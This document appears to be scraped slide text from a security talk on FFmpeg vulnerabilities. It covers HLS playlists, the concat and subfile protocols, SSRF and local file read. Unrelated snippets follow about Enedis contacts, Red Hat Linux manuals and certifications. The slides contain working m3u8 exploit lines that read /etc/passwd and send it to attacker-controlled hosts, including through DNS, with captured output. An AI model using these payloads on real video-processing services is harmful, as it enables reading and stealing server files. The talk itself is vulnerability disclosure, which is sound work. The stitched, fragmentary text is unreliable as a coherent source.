Who are we?Maxim Andreev @cdump Software developer:Cloud@Mail.RUBughunter, CTF playerNikolay Ermishkin @ sl1m Security Analyst: @Mail.RuBug hunter, CTF playerImageTragick creator
Agenda BackgroundHow FFmpeg worksHTTP Live StreamingExploit 1Exploit 2 (better version).Exploit NConclusion
Background dozens of video formats hundreds of video/audio codecs different bitrates, resolutions, etc.
FFmpeg
How FFmpeg works: user’s view
How FFmpeg REALLY works
Look closer to FFmpeg: extension
Look closer to FFmpeg: extension
Look closer to FFmpeg: extension
Look closer to FFmpeg: .txt
Look closer to FFmpeg: .txt
HTTP Live Streaming - HLS live and on-demand streaming developed by Apple supported in FFmpeg doc: https://developer.apple.com/streaming/
HTTP Live Streaming - HLS
0.0,http://cdev.dx.su:1234/8.mp4#EXT-X-ENDLIST
HTTP Live Streaming - HLS
HTTP Live Streaming - HLS
HTTP Live Streaming - HLS
SSRF: read ENDLIST
SSRF: read XT-X-ENDLIST
TXT
FFmpeg: concatconcat - read and seek from manyresources in sequence as if they were aunique resource
header.m3u8FFmpeg: ttp://dx.su?
header.m3u8FFmpeg: 10.0,concat:http://dx.su/header.m3u8 file:///etc/passwd#EXT-X-ENDLIST
FFmpeg: concatHTTP request tohttp://dx.su?root:x:0:0:root:/root:/usr/bin/zsh
YUV4MPEG2header.y4mYUV4MPEG2 W30 H30 F25:1 Ip A0:0 EXTINF:10.0,concat:http://dx.su/header.y4m file:///etc/passwd#EXT-X-ENDLIST
YUV4MPEG2
YUV4MPEG2thumbnail.png
YUV4MPEG2
5000 800
5000 800 1000
We need better POCs.
http://dx.su/header.m3u8 file:///etc/passwd#EXT-X-ENDLIST
Exploit cons Reads first line only Web server needed to reproduce
Read full filesubfile,,start,34,end,10000,,:/etc/passwd# read /etc/paswd from the second line
Read full cat:http://example.com/header.m3u8 DLIST
Read full filesubfile,,start,0.Attacker’sserverroot:x:0 (len 33)subfile,,start,34.Target
DEMO
Can you hack Facebook with this?
Forgotten DNSffmpeg.yngwie.ru69.63.185.113 # facebook ISPSat Mar 19 2016 08:02:38 GMT-0400(EDT)
Is it exploitable?
File 0.0,concat:file:///etc/passwd http://ffmpeg.example.com/video.mp4#EXT-X-ENDLIST
It’s cool but we want to read files
TINF:10.0,concat:http://dx.su/header.m3u8 file:///etc/passwd#EXT-X-ENDLIST
dns 0.0,http://dns footer.m3u8.example.org
We can construct m3u8 from local file.#EXTINF:10.0,concat:http://example.org/dns header.m3u8 subfile,,start,0,end,4,,:///etc/passwd http://example.org/dns footer.m3u8#EXT-X-ENDLIST
We can’t use HTTP to get our m3u8.
We can construct m3u8 from local file.#EXTINF:10.0,concat:file:/dns header.m3u8 subfile,,start,0,end,4,,:///etc/passwd file:/dns footer.m3u8#EXT-X-ENDLIST
But target system hasn’t our m3u8 files.
Let’s build them
So we have an m3u8 inside other m3u8crafted by chars from known files.
And surprisingly it worksroot.yngwie.ru # first 4 bytes of/etc/passwd77.37.251.68
I tried to share my new POC
Oops, I did it again
Is this enough for full service hack?
Exploitation without network support .txt trick Error-based
Error-based
How to check my service?
Tool
My service has no video, should I careabout this vulnerability?
ImageMagick
I am user, not developer.Am I in danger?
Video files in folder
Ubuntu Linux with FFmpeg
Kali Linux with GStreamer
Results Attack video converting services Attack Linux users Attack with “HACK IT! button” FFmpeg protocol whitelist patch
Questions?Maxim Andreev@cdumpandreevmaxim@gmail.comNikolay Ermishkin@ sl1mnikolay.ermishkin@gmail.com
How FFmpeg works HTTP Live Streaming Exploit 1 Exploit 2 (better version) . Exploit N Conclusion. Background dozens of video formats hundreds of video/audio codecs different bitrates, resolutions, etc. FFmpeg
L’ARÉ est également le point d’entrée en as de demande simultanée onsommation et prodution. Les coordonnées des ARÉ sont présentées dans le tableau ci-dessous : DR Clients Téléphone Adresse mail Île de France Est particuliers 09 69 32 18 33 are-essonne@enedis.fr professionnels 09 69 32 18 34 Île de France Ouest
Red Hat Enterprise Linux 6 Security Guide A Guide to Securing Red Hat Enterprise Linux Mirek Jahoda Red Hat Customer Content Services mjahoda@redhat.com Robert Krátký Red Hat Customer Content Services Martin Prpič Red Hat Customer Content Services Tomáš Čapek Red Hat Customer Content Services Stephen Wadeley Red Hat Customer Content Services Yoana Ruseva Red Hat Customer Content Services .
As 20 melhores certificações e cursos do Red Hat Linux Red Hat Certified System Administrator (RHCSA) Engenheiro Certificado Red Hat (RHCE) Red Hat Certified Enterprise Application Developer Red Hat Certified Architect (RHCA) Engenheiro certificado pela Red Hat no Red Hat OpenStack. Administração do Red Hat Enterprise Linux (EL) Desenvolvedor de microsserviços corporativos com .
Red Hat Enterprise Linux 7 - IBM Power System PPC64LE (Little Endian) Red Hat Enterprise Linux 7 for IBM Power LE Supplementary (RPMs) Red Hat Enterprise Linux 7 for IBM Power LE Optional (RPMs) Red Hat Enterprise Linux 7 for IBM Power LE (RPMs) RHN Tools for Red Hat Enterprise Linux 7 for IBM Power LE (RPMs) Patch for Red Hat Enterprise Linux - User's Guide 1 - Overview 4 .
configuration and administration of Red Hat Enterprise Linux 5. For more information about Red Hat Cluster Suite for Red Hat Enterprise Linux 5, refer to the following resources: Configuring and Managing a Red Hat Cluster — Provides information about installing, configuring and managing Red Hat Cluster components.
Red Hat System Administration I RH124 · 5 days · Recommended Red Hat Certified System Administration exam EX200 · 2.5 hours · Required Red Hat System Administration II RH134 · 4 days · Recommended Red Hat Certified System Administrator Required for Red Hat Certified Engineer Red Hat System
6.1.1. red hat enterprise linux 8 6.1.2. red hat enterprise linux add-ons 12 6.1.3. red hat enterprise linux for power 18 6.1.4. red hat enterprise linux for z systems 22 6.1.5. red hat enterprise linux for z systems extended life cycle support add-on 24 6.1.6. red hat enterprise linux for ibm system z and linuxone with comprehensive add-ons 25 .
SAP Leonardo Innovation System 3rd Party SAP S/4 HANA Cloud SAP ABAP 28 Where SAP & Red Hat Architecture Intersects Red Hat API Management Red Hat Enterprise Linux underpinning SaaS offerings Red Hat lead OS projects Kubernetes, kNative, Istio Red Hat Enterprise Linux e.g. SAP HANA Red Hat CCSP